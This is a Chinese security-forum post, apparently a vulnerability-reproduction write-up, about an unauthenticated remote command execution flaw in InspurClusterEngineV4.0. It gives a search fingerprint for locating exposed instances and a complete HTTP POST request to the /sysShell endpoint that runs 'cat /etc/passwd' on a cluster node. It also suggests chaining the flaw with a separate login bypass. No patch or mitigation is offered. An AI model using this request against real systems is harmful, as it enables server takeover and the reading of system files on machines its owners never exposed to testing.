问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
InspurClusterEngineV4.0 sysShell 任意命令执行漏洞
# InspurClusterEngineV4.0 sysShell 任意命令执行漏洞 ## 漏洞描述 InspurClusterEngineV4.0 存在远程命令执行,攻击者通过发送特殊的请求可以获取服务器权限 ## 漏洞影响 InspurC...
InspurClusterEngineV4.0 sysShell 任意命令执行漏洞 ========================================= 漏洞描述 ---- InspurClusterEngineV4.0 存在远程命令执行,攻击者通过发送特殊的请求可以获取服务器权限 漏洞影响 ---- InspurClusterEngineV4.0 网络测绘 ---- title="TSCEV4.0" 漏洞复现 ---- 登录页面如下 ![img](https://shs3.b.qianxin.com/butian_public/f5404132be7b8a5a307dc8ca5004584fbf84c68c3ed9b.jpg) 发送请求包 ```shell POST /sysShell HTTP/1.1 Host: Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: lang=cn Cache-Control: max-age=0 Content-Length: 42 op=doPlease&node=cu01&command=cat /etc/passwd ``` ![img](https://shs3.b.qianxin.com/butian_public/f51222039561e311e0a6130550ecf1d403f6587685736.jpg) 注意参数 node 中的 cu01 需要为shell集群中的存在主机 ![img](https://shs3.b.qianxin.com/butian_public/f51314717c9e28a7a9b04a231552dcd62548d875c05ac.jpg) 这里可以配合任意用户登录漏洞查看主机名
发表于 2024-07-12 18:46:17
阅读 ( 1360 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!